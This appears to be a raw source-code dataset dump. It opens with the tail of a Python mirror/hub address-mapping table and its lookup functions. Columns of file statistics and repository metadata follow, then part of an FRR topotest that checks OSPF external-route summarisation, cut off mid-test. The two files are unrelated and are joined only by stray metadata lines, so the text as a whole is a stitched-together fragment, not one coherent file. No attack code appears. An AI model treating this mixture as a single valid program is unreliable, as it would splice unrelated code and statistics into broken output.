    {"mirror":14,"mirror_hub":7,"hub":2,"bonnet":1,"UD-port":8,"LR-port":9},
    {"mirror":15,"mirror_hub":3,"hub":2,"bonnet":0,"UD-port":4,"LR-port":5},
    {"mirror":16,"mirror_hub":5,"hub":3,"bonnet":2,"UD-port":4,"LR-port":5},
    {"mirror":17,"mirror_hub":4,"hub":3,"bonnet":0,"UD-port":8,"LR-port":9},
    {"mirror":18,"mirror_hub":3,"hub":3,"bonnet":0,"UD-port":4,"LR-port":5},
    {"mirror":19,"mirror_hub":9,"hub":4,"bonnet":2,"UD-port":2,"LR-port":3},
    {"mirror":20,"mirror_hub":13,"hub":4,"bonnet":2,"UD-port":6,"LR-port":7},
    {"mirror":21,"mirror_hub":13,"hub":2,"bonnet":2,"UD-port":6,"LR-port":7},
    {"mirror":22,"mirror_hub":8,"hub":2,"bonnet":2,"UD-port":8,"LR-port":9},
    {"mirror":23,"mirror_hub":4,"hub":2,"bonnet":0,"UD-port":8,"LR-port":9},
    {"mirror":24,"mirror_hub":1,"hub":2,"bonnet":0,"UD-port":2,"LR-port":3},
    {"mirror":25,"mirror_hub":2,"hub":3,"bonnet":0,"UD-port":6,"LR-port":7},
    {"mirror":26,"mirror_hub":1,"hub":3,"bonnet":0,"UD-port":2,"LR-port":3},
    {"mirror":27,"mirror_hub":5,"hub":4,"bonnet":2,"UD-port":4,"LR-port":5},
    {"mirror":28,"mirror_hub":8,"hub":4,"bonnet":2,"UD-port":8,"LR-port":9},
    {"mirror":29,"mirror_hub":12,"hub":4,"bonnet":1,"UD-port":4,"LR-port":5},
    {"mirror":30,"mirror_hub":14,"hub":2,"bonnet":2,"UD-port":0,"LR-port":1},
    {"mirror":31,"mirror_hub":9,"hub":2,"bonnet":2,"UD-port":2,"LR-port":3},
    {"mirror":32,"mirror_hub":5,"hub":2,"bonnet":2,"UD-port":4,"LR-port":5},
    {"mirror":33,"mirror_hub":2,"hub":2,"bonnet":0,"UD-port":6,"LR-port":7},
    {"mirror":34,"mirror_hub":0,"hub":2,"bonnet":0,"UD-port":0,"LR-port":1},
    {"mirror":35,"mirror_hub":0,"hub":3,"bonnet":0,"UD-port":0,"LR-port":1},
    {"mirror":36,"mirror_hub":2,"hub":4,"bonnet":0,"UD-port":6,"LR-port":7},
    {"mirror":37,"mirror_hub":4,"hub":4,"bonnet":0,"UD-port":8,"LR-port":9},
    {"mirror":38,"mirror_hub":7,"hub":4,"bonnet":1,"UD-port":8,"LR-port":9},
    {"mirror":39,"mirror_hub":11,"hub":4,"bonnet":1,"UD-port":2,"LR-port":3},
    {"mirror":40,"mirror_hub":10,"hub":1,"bonnet":1,"UD-port":0,"LR-port":1},
    {"mirror":41,"mirror_hub":6,"hub":1,"bonnet":1,"UD-port":6,"LR-port":7},
    {"mirror":42,"mirror_hub":3,"hub":1,"bonnet":0,"UD-port":4,"LR-port":5},
    {"mirror":43,"mirror_hub":1,"hub":1,"bonnet":0,"UD-port":2,"LR-port":3},
    {"mirror":44,"mirror_hub":0,"hub":1,"bonnet":0,"UD-port":0,"LR-port":1},
    {"mirror":45,"mirror_hub":15,"hub":2,"bonnet":0,"UD-port":10,"LR-port":11},
    {"mirror":46,"mirror_hub":0,"hub":4,"bonnet":0,"UD-port":0,"LR-port":1},
    {"mirror":47,"mirror_hub":1,"hub":4,"bonnet":0,"UD-port":2,"LR-port":3},
    {"mirror":48,"mirror_hub":3,"hub":4,"bonnet":0,"UD-port":4,"LR-port":5},
    {"mirror":49,"mirror_hub":6,"hub":4,"bonnet":1,"UD-port":6,"LR-port":7},
    {"mirror":50,"mirror_hub":10,"hub":4,"bonnet":1,"UD-port":0,"LR-port":1},
    {"mirror":51,"mirror_hub":11,"hub":1,"bonnet":1,"UD-port":2,"LR-port":3},
    {"mirror":52,"mirror_hub":7,"hub":1,"bonnet":1,"UD-port":8,"LR-port":9},
    {"mirror":53,"mirror_hub":4,"hub":1,"bonnet":0,"UD-port":8,"LR-port":9},
    {"mirror":54,"mirror_hub":2,"hub":1,"bonnet":0,"UD-port":6,"LR-port":7},
    {"mirror":55,"mirror_hub":0,"hub":6,"bonnet":0,"UD-port":0,"LR-port":1},
    {"mirror":56,"mirror_hub":0,"hub":5,"bonnet":0,"UD-port":0,"LR-port":1},
    {"mirror":57,"mirror_hub":2,"hub":5,"bonnet":0,"UD-port":6,"LR-port":7},
    {"mirror":58,"mirror_hub":5,"hub":5,"bonnet":2,"UD-port":4,"LR-port":5},
    {"mirror":59,"mirror_hub":9,"hub":5,"bonnet":2,"UD-port":2,"LR-port":3},
    {"mirror":60,"mirror_hub":14,"hub":5,"bonnet":2,"UD-port":0,"LR-port":1},
    {"mirror":61,"mirror_hub":12,"hub":1,"bonnet":1,"UD-port":4,"LR-port":5},
    {"mirror":62,"mirror_hub":8,"hub":1,"bonnet":2,"UD-port":8,"LR-port":9},
    {"mirror":63,"mirror_hub":5,"hub":1,"bonnet":2,"UD-port":4,"LR-port":5},
    {"mirror":64,"mirror_hub":1,"hub":6,"bonnet":0,"UD-port":2,"LR-port":3},
    {"mirror":65,"mirror_hub":2,"hub":6,"bonnet":0,"UD-port":6,"LR-port":7},
    {"mirror":66,"mirror_hub":1,"hub":5,"bonnet":0,"UD-port":2,"LR-port":3},
    {"mirror":67,"mirror_hub":4,"hub":5,"bonnet":0,"UD-port":8,"LR-port":9},
    {"mirror":68,"mirror_hub":8,"hub":5,"bonnet":2,"UD-port":8,"LR-port":9},
    {"mirror":69,"mirror_hub":13,"hub":5,"bonnet":2,"UD-port":6,"LR-port":7},
    {"mirror":70,"mirror_hub":13,"hub":1,"bonnet":2,"UD-port":6,"LR-port":7},
    {"mirror":71,"mirror_hub":9,"hub":1,"bonnet":2,"UD-port":2,"LR-port":3},
    {"mirror":72,"mirror_hub":3,"hub":6,"bonnet":0,"UD-port":4,"LR-port":5},
    {"mirror":73,"mirror_hub":4,"hub":6,"bonnet":0,"UD-port":8,"LR-port":9},
    {"mirror":74,"mirror_hub":5,"hub":6,"bonnet":2,"UD-port":4,"LR-port":5},
    {"mirror":75,"mirror_hub":3,"hub":5,"bonnet":0,"UD-port":4,"LR-port":5},
    {"mirror":76,"mirror_hub":7,"hub":5,"bonnet":1,"UD-port":8,"LR-port":9},
    {"mirror":77,"mirror_hub":12,"hub":5,"bonnet":1,"UD-port":4,"LR-port":5},
    {"mirror":78,"mirror_hub":14,"hub":1,"bonnet":2,"UD-port":0,"LR-port":1},
    {"mirror":79,"mirror_hub":6,"hub":6,"bonnet":1,"UD-port":6,"LR-port":7},
    {"mirror":80,"mirror_hub":7,"hub":6,"bonnet":1,"UD-port":8,"LR-port":9},
    {"mirror":81,"mirror_hub":8,"hub":6,"bonnet":2,"UD-port":8,"LR-port":9},
    {"mirror":82,"mirror_hub":9,"hub":6,"bonnet":2,"UD-port":2,"LR-port":3},
    {"mirror":83,"mirror_hub":6,"hub":5,"bonnet":1,"UD-port":6,"LR-port":7},
    {"mirror":84,"mirror_hub":11,"hub":5,"bonnet":1,"UD-port":2,"LR-port":3},
    {"mirror":85,"mirror_hub":10,"hub":6,"bonnet":1,"UD-port":0,"LR-port":1},
    {"mirror":86,"mirror_hub":11,"hub":6,"bonnet":1,"UD-port":2,"LR-port":3},
    {"mirror":87,"mirror_hub":12,"hub":6,"bonnet":1,"UD-port":4,"LR-port":5},
    {"mirror":88,"mirror_hub":13,"hub":6,"bonnet":2,"UD-port":6,"LR-port":7},
    {"mirror":89,"mirror_hub":14,"hub":6,"bonnet":2,"UD-port":0,"LR-port":1},
    {"mirror":90,"mirror_hub":10,"hub":5,"bonnet":1,"UD-port":0,"LR-port":1}
]#end of mirror mappings
def getMirrorAddresses(mirror):
    """Return the complete address record for a logical mirror ID.

    * `mirror`: logical mirror ID (0 .. len(mirrormappings) - 1).

    Returns a dict such as
    {"mirror":0,"mirror_hub":10,"hub":2,"bonnet":1,"UD-port":0,"LR-port":1}.

    Raises ValueError (a subclass of the Exception previously raised here)
    for an out-of-range mirror ID.
    """
    # Bound the check to the actual table size instead of the former
    # hard-coded 91, so the map can grow or shrink without editing this code.
    if mirror < 0 or mirror >= len(mirrormappings):
        raise ValueError('error', 'mirrormap.py invalid mirror ID:' + str(mirror))
    return mirrormappings[mirror]
def getMirrorHubAddresses(hub, mirror_hub):
    """Return the address record of the mirror at a given position on a hub.

    * `hub`: hub identifier; accepts an int (e.g. 2), a bare numeric string
      (e.g. "2"), or a full dictionary key (e.g. "hub2").
    * `mirror_hub`: index of the mirror within that hub's list.

    Raises KeyError for an unknown hub and IndexError for a bad mirror_hub.
    """
    # Normalise every accepted spelling of the hub to the "hubN" dict key.
    if type(hub) is int:
        hub = 'hub' + str(hub)
    elif type(hub) is str and not hub.startswith('hub'):
        # Generalised from the original single-character check so that
        # multi-digit hub numbers given as strings also work.
        hub = 'hub' + hub
    return hubmappings[hub][mirror_hub]
def getMirrorHubAddress(mirror):
    """Return the mirror_hub index (position on its hub) for a mirror ID.

    * `mirror`: logical mirror ID (0 .. len(mirrormappings) - 1).

    Raises ValueError (a subclass of the Exception previously raised here)
    for an out-of-range mirror ID.
    """
    # Use the table length rather than a hard-coded 91 as the upper bound.
    if mirror < 0 or mirror >= len(mirrormappings):
        raise ValueError('error', 'mirrormap.py invalid mirror ID:' + str(mirror))
    return mirrormappings[mirror]['mirror_hub']
def getMirrorAddress(hub, mirror_hub):
    """Return the logical mirror ID for a given position on a hub.

    * `hub`: hub identifier; accepts an int (e.g. 2), a bare numeric string
      (e.g. "2"), or a full dictionary key (e.g. "hub2").
    * `mirror_hub`: index of the mirror within that hub's list.

    Raises KeyError for an unknown hub and IndexError for a bad mirror_hub.
    """
    # Normalise every accepted spelling of the hub to the "hubN" dict key.
    if type(hub) is int:
        hub = 'hub' + str(hub)
    elif type(hub) is str and not hub.startswith('hub'):
        # Generalised from the original single-character check so that
        # multi-digit hub numbers given as strings also work.
        hub = 'hub' + hub
    return hubmappings[hub][mirror_hub]['mirror']
def getHubNumber(mirror):
    """Return the hub number a mirror is wired to (e.g. 2).

    * `mirror`: logical mirror ID (0 .. len(mirrormappings) - 1).

    Raises ValueError (a subclass of the Exception previously raised here)
    for an out-of-range mirror ID.
    """
    # Use the table length rather than a hard-coded 91 as the upper bound.
    if mirror < 0 or mirror >= len(mirrormappings):
        raise ValueError('error', 'mirrormap.py invalid mirror ID:' + str(mirror))
    return mirrormappings[mirror]['hub']
| 54.842105
| 119
| 0.621041
| 3,196
| 16,672
| 3.180538
| 0.089174
| 0.168224
| 0.054894
| 0.079292
| 0.805312
| 0.805312
| 0.798623
| 0.798623
| 0.794491
| 0.791736
| 0
| 0.085893
| 0.053083
| 16,672
| 303
| 120
| 55.023102
| 0.557991
| 0.119962
| 0
| 0.723684
| 0
| 0
| 0.496547
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02193
| false
| 0.008772
| 0
| 0
| 0.04386
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64dfa0c69d18250e9161aefd53d7c0e99359f165
| 111,960
|
py
|
Python
|
src/frr/tests/topotests/ospf_basic_functionality/test_ospf_asbr_summary_topo1.py
|
zhouhaifeng/vpe
|
9c644ffd561988e5740021ed26e0f7739844353d
|
[
"Apache-2.0"
] | null | null | null |
src/frr/tests/topotests/ospf_basic_functionality/test_ospf_asbr_summary_topo1.py
|
zhouhaifeng/vpe
|
9c644ffd561988e5740021ed26e0f7739844353d
|
[
"Apache-2.0"
] | null | null | null |
src/frr/tests/topotests/ospf_basic_functionality/test_ospf_asbr_summary_topo1.py
|
zhouhaifeng/vpe
|
9c644ffd561988e5740021ed26e0f7739844353d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright (c) 2020 by VMware, Inc. ("VMware")
# Used Copyright (c) 2018 by Network Device Education Foundation, Inc.
# ("NetDEF") in this file.
#
# Permission to use, copy, modify, and/or distribute this software
# for any purpose with or without fee is hereby granted, provided
# that the above copyright notice and this permission notice appear
# in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND VMWARE DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL VMWARE BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
#
"""OSPF Summarisation Functionality Automation."""
import os
import sys
import time
import pytest
# Save the Current Working Directory to find configuration files.
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(CWD, "../"))
sys.path.append(os.path.join(CWD, "../lib/"))
# pylint: disable=C0413
# Import topogen and topotest helpers
from lib.topogen import Topogen, get_topogen
import ipaddress
from time import sleep
# Import topoJson from lib, to create topology and initial configuration
from lib.common_config import (
start_topology,
write_test_header,
kill_router_daemons,
write_test_footer,
reset_config_on_routers,
stop_router,
start_router,
verify_rib,
create_static_routes,
step,
start_router_daemons,
create_route_maps,
shutdown_bringup_interface,
topo_daemons,
create_prefix_lists,
create_route_maps,
create_interfaces_cfg,
)
from lib.topolog import logger
from lib.topojson import build_config_from_json
from lib.ospf import (
verify_ospf_neighbor,
clear_ospf,
verify_ospf_rib,
create_router_ospf,
verify_ospf_summary,
)
# This suite exercises ospfd and staticd; skip it if either daemon is absent.
pytestmark = [pytest.mark.ospfd, pytest.mark.staticd]
# Global variables
# Topology description; populated by setup_module() from the suite's JSON file.
topo = None
# First batch of /32 prefixes installed as static routes on R0 and
# redistributed into OSPF (all fall under the 11.0.0.0/8 summary).
NETWORK = {
    "ipv4": [
        "11.0.20.1/32",
        "11.0.20.2/32",
        "11.0.20.3/32",
        "11.0.20.4/32",
        "11.0.20.5/32",
    ]
}
# Two extra prefixes in the same 11.0.20.x range, used by some testcases.
NETWORK_11 = {"ipv4": ["11.0.20.6/32", "11.0.20.7/32"]}
# Second batch of /32 prefixes (under 12.0.0.0/8) redistributed from R0.
NETWORK2 = {
    "ipv4": [
        "12.0.20.1/32",
        "12.0.20.2/32",
        "12.0.20.3/32",
        "12.0.20.4/32",
        "12.0.20.5/32",
    ]
}
# Summary prefixes configured on R0 via "summary-address" in the testcases.
SUMMARY = {"ipv4": ["11.0.0.0/8", "12.0.0.0/8", "11.0.0.0/24"]}
"""
TOPOLOGY =
Please view in a fixed-width font such as Courier.
+---+ A0 +---+
+R1 +------------+R2 |
+-+-+- +--++
| -- -- |
| -- A0 -- |
A0| ---- |
| ---- | A0
| -- -- |
| -- -- |
+-+-+- +-+-+
+R0 +-------------+R3 |
+---+ A0 +---+
TESTCASES =
1. OSPF summarisation functionality.
2. OSPF summarisation with metric type 2.
3. OSPF summarisation with Tag option
4. OSPF summarisation with advertise and no advertise option
5. OSPF summarisation Chaos.
6. OSPF summarisation with route map filtering.
7. OSPF summarisation with route map modification of metric type.
8. OSPF CLI Show verify ospf ASBR summary config and show commands behaviours.
"""
def setup_module(mod):
    """
    Set up the pytest environment for this suite.

    * `mod`: module name
    """
    start_time = time.asctime(time.localtime(time.time()))
    logger.info("Testsuite start time: {}".format(start_time))
    logger.info("=" * 40)
    logger.info("Running setup_module to create topology")
    # Build the topology with Topogen from the suite's JSON description.
    json_file = "{}/ospf_asbr_summary_topo1.json".format(CWD)
    tgen = Topogen(json_file, mod.__name__)
    global topo
    topo = tgen.json_topo
    # Determine which daemons this suite needs, then boot the routers with
    # the generated temporary configuration files loaded.
    daemons = topo_daemons(tgen, topo)
    start_topology(tgen, daemons)
    # Push the per-router configuration derived from the JSON topology.
    build_config_from_json(tgen, topo)
    # Abort early if any router failed to come up.
    if tgen.routers_have_failure():
        pytest.skip(tgen.errors)
    # Wait until all OSPF neighborships have converged before tests run.
    convergence = verify_ospf_neighbor(tgen, topo)
    assert convergence is True, "setup_module :Failed \n Error: {}".format(convergence)
    logger.info("Running setup_module() done")
def teardown_module(mod):
    """
    Tear down the pytest environment after the suite finishes.

    * `mod`: module name
    """
    logger.info("Running teardown_module to delete topology")
    tgen = get_topogen()
    # Stop the topology and remove its temporary files.
    tgen.stop_topology()
    end_time = time.asctime(time.localtime(time.time()))
    logger.info("Testsuite end time: {}".format(end_time))
    logger.info("=" * 40)
def red_static(dut, config=True):
    """
    Configure or remove redistribution of static routes into OSPF.

    Parameters
    ----------
    * `dut` : DUT on which configs have to be made.
    * `config` : True or False, True by default for configure, set False for
                 unconfiguration.
    """
    global topo
    tgen = get_topogen()
    # Build the redistribute stanza once; only unconfiguration adds "delete".
    redistribute = {"redist_type": "static"}
    if not config:
        redistribute["delete"] = True
    ospf_red = {dut: {"ospf": {"redistribute": [redistribute]}}}
    result = create_router_ospf(tgen, topo, ospf_red)
    assert result is True, "Testcase : Failed \n Error: {}".format(result)
def red_connected(dut, config=True):
    """
    Configure or remove redistribution of connected routes into OSPF.

    Parameters
    ----------
    * `dut` : DUT on which configs have to be made.
    * `config` : True or False, True by default for configure, set False for
                 unconfiguration.
    """
    global topo
    tgen = get_topogen()
    # Build the redistribute stanza once; only unconfiguration adds "delete".
    redistribute = {"redist_type": "connected"}
    if not config:
        redistribute["delete"] = True
    ospf_red = {dut: {"ospf": {"redistribute": [redistribute]}}}
    result = create_router_ospf(tgen, topo, ospf_red)
    assert result is True, "Testcase: Failed \n Error: {}".format(result)
# ##################################
# Test cases start here.
# ##################################
def test_ospf_type5_summary_tc43_p0(request):
    """OSPF summarisation with metric type 2.

    Installs 10 static routes on R0 and redistributes them into OSPF, then
    verifies that summary-address configuration (mask changes /8 -> /16 ->
    /24, un-configuration and re-configuration) produces the expected
    summary route on R1 and the expected "show ip ospf summary" on R0.
    """
    tc_name = request.node.name
    write_test_header(tc_name)
    tgen = get_topogen()
    # Don't run this test if we have any failure.
    if tgen.routers_have_failure():
        pytest.skip(tgen.errors)
    global topo
    step("Bring up the base config as per the topology")
    reset_config_on_routers(tgen)
    protocol = "ospf"
    step(
        "Configure 5 static routes from the same network on R0"
        "5 static routes from different networks and redistribute in R0"
    )
    input_dict_static_rtes = {
        "r0": {
            "static_routes": [
                {"network": NETWORK["ipv4"], "next_hop": "blackhole"},
                {"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
            ]
        }
    }
    result = create_static_routes(tgen, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    dut = "r0"
    red_static(dut)
    step("Verify that routes are learnt on R1.")
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
    step(
        "Configure External Route summary in R0 to summarise 5" " routes to one route."
    )
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    step(
        "Verify that external routes are summarised to configured summary "
        "address on R0 after 5 secs of delay timer expiry and only one "
        "route is sent to R1."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
    step("Verify that show ip ospf summary should show the summaries.")
    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
    step("Change the summary address mask to lower match (ex - 16 to 8)")
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "16"}
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    input_dict = {
        "11.0.0.0/16": {
            "Summary address": "11.0.0.0/16",
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
    step(
        "Verify that external routes(static / connected) are summarised"
        " to configured summary address with newly configured mask."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": "11.0.0.0/16"}]}}
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
    step("Change the summary address mask to higher match (ex - 8 to 24)")
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "24"}
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    input_dict = {
        # FIX: the key used to be "11.0.0.0/16", which checked the wrong
        # summary entry; it must match the /24 summary configured above.
        # No /32 static falls inside 11.0.0.0/24, hence route count 0.
        "11.0.0.0/24": {
            "Summary address": "11.0.0.0/24",
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 0,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
    step(
        "Verify that external routes(static / connected) are summarised"
        " to configured summary address with newly configured mask."
    )
    step("Configure 2 summary address with different mask of same network.")
    step(
        "Verify that external routes(static / connected) are summarised "
        "to configured summary address with highest match."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": "11.0.0.0/16"}]}}
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
    step(" Un configure one of the summary address.")
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {
                        "prefix": SUMMARY["ipv4"][0].split("/")[0],
                        "mask": "24",
                        "delete": True,
                    }
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    step(
        "Verify that external routes(static / connected) are summarised"
        " to configured summary address with newly configured mask."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": "11.0.0.0/16"}]}}
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
    # Re-add the /24 summary and confirm the highest-match /16 still wins.
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "24"}
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    step(
        "Verify that external routes(static / connected) are summarised "
        "to configured summary address with highest match."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": "11.0.0.0/16"}]}}
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
    write_test_footer(tc_name)
def test_ospf_type5_summary_tc48_p0(request):
    """OSPF summarisation with route map modification of metric type.

    Flow:
      1. Redistribute blackhole static routes on R0 and verify they reach R1.
      2. Configure a summary-address on R0; verify only the summary is sent
         to R1 and the originals are withdrawn.
      3. Attach a route map (permit-any prefix list) to the static
         redistribution and re-verify the summary and its attributes.
      4. Set and then unset ``metric-type type-1`` in the route map.
      5. Flip the prefix-list rule from permit to deny.
    """
    tc_name = request.node.name
    write_test_header(tc_name)
    tgen = get_topogen()

    # Don't run this test if we have any failure.
    if tgen.routers_have_failure():
        pytest.skip(tgen.errors)

    global topo
    step("Bring up the base config as per the topology")
    reset_config_on_routers(tgen)

    protocol = "ospf"

    step(
        "Configure 5 static routes from the same network on R0"
        "5 static routes from different networks and redistribute in R0"
    )
    input_dict_static_rtes = {
        "r0": {
            "static_routes": [
                {"network": NETWORK["ipv4"], "next_hop": "blackhole"},
                {"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
            ]
        }
    }
    result = create_static_routes(tgen, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    dut = "r0"
    red_static(dut)

    step("Verify that routes are learnt on R1.")
    dut = "r1"

    result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    step(
        "Configure External Route summary in R0 to summarise 5" " routes to one route."
    )
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes are summarised to configured summary "
        "address on R0 after 5 secs of delay timer expiry and only one "
        "route is sent to R1."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
    dut = "r1"

    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    step("Verify that show ip ospf summary should show the summaries.")
    input_dict = {
        SUMMARY["ipv4"][0]: {
            "Summary address": SUMMARY["ipv4"][0],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 5,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(tc_name)

    step("Verify that originally advertised routes are withdraw from there" " peer.")
    input_dict = {
        "r0": {"static_routes": [{"network": NETWORK["ipv4"], "next_hop": "blackhole"}]}
    }
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in OSPF RIB {}".format(
        tc_name, result
    )

    result = verify_rib(
        tgen, "ipv4", dut, input_dict, protocol=protocol, expected=False
    )
    assert (
        result is not True
    ), "Testcase {} : Failed \n Error: Routes still present in RIB".format(tc_name)

    step(
        "Configure route map and & rule to permit configured summary address,"
        " redistribute static & connected routes with the route map."
    )
    step("Configure prefixlist to permit the static routes, add to route map.")
    # Create ip prefix list
    pfx_list = {
        "r0": {
            "prefix_lists": {
                "ipv4": {
                    "pf_list_1_ipv4": [
                        {"seqid": 10, "network": "any", "action": "permit"}
                    ]
                }
            }
        }
    }
    result = create_prefix_lists(tgen, pfx_list)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    routemaps = {
        "r0": {
            "route_maps": {
                "rmap_ipv4": [
                    {
                        "action": "permit",
                        "match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
                    }
                ]
            }
        }
    }
    result = create_route_maps(tgen, routemaps)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    ospf_red_r1 = {
        "r0": {
            "ospf": {
                "redistribute": [{"redist_type": "static", "route_map": "rmap_ipv4"}]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_red_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that external routes are summarised to configured"
        "summary address on R0 and only one route is sent to R1. Verify that "
        "show ip ospf summary should show the configure summaries."
    )
